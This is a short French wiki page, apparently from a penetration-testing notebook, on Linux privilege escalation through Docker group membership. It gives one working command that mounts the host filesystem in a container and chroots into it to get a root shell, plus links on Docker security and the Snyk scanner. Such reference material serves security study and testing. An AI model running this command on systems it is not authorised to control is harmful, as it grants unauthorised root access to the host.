[Privesc/Linux] Docker

Introduction

Cette page décrit les techniques utilisées pour monter son niveau de privilège grâce à docker.

Techniques

Utilisateur dans le groupe docker

Si vous avez accès à un compte utilisateur appartenant au groupe docker et pouvant exécuter des commandes docker, vous pourrez créer un conteneur qui exécutera un shell root grâce à la commande suivante :

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Voici un site qui répertorie des techniques pour casser les sécurités de docker

https://www.hackitude.in/docker-security

Snyk

Cet outil permet de trouver les vulnérabilités dans les conteneurs docker :

https://github.com/snyk/cli

[Privesc/Linux] Cheat-sheet

[Privesc/Linux] Docker

[Privesc/Linux] Tar wildcard

[Privesc/Linux] Looney Tunables

[Privesc/Linux] Chemin de binaire incomplet

[Privesc/Windows] Winpeas

[Privesc/Windows] Cheat-sheet

[Privesc/Windows] Bypass UAC

[Privesc/Linux] Docker

Introduction

Techniques

Utilisateur dans le groupe docker

Snyk

No Comments